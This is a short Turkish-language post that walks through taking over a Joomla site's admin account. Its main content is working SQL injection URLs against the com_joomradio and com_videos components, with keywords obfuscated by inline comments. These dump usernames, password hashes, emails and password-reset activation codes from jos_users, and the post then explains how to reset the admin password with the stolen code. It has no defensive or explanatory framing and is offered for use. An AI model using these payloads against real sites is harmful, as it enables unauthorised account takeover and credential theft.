Joomla sitelerin veritabanı mysql olduğu için user şifreleri md5 şeklinde kriptoludur. Kırılmayan bu admin şifrelerini sıfırlamaya yolunu bir arkadaştan buldum, burada paylaşmak istedim.
Kullanıcı adı ve Şifreleri bu şekilde öğreniriz.
http://localhost/index.php?view=display&option=com_joomradio&id=1+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,password),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users
admin:d94236746886b37f57cba28145926c09
Ekrana bu şekilde bilgimiz geldi ve md5 çözülemiyor. Sırada admin mail adresini öğreniriz.
http://localhost/index.php?view=display&option=com_joomradio&id=1+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,email),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users
admin:admin@mail.com
Ekranda admin in mail adresi de çıktı. şimdi aşağıdaki linke giriyoruz.
http://localhost/index.php?option=com_user&view=reset
Şifre sıfırlama bölümünden maili yazıyoruz sonra aktivasyon kodu isteyecek şimdi maile yolladığı aktivasyon kodunu öğrenelim.
http://localhost/index.php?view=display&option=com_videos&id=3+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,activation),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users
admin:aktivekodu aktivasyon kodunu böylece alıp şifreyi değiştirebiliriz artık.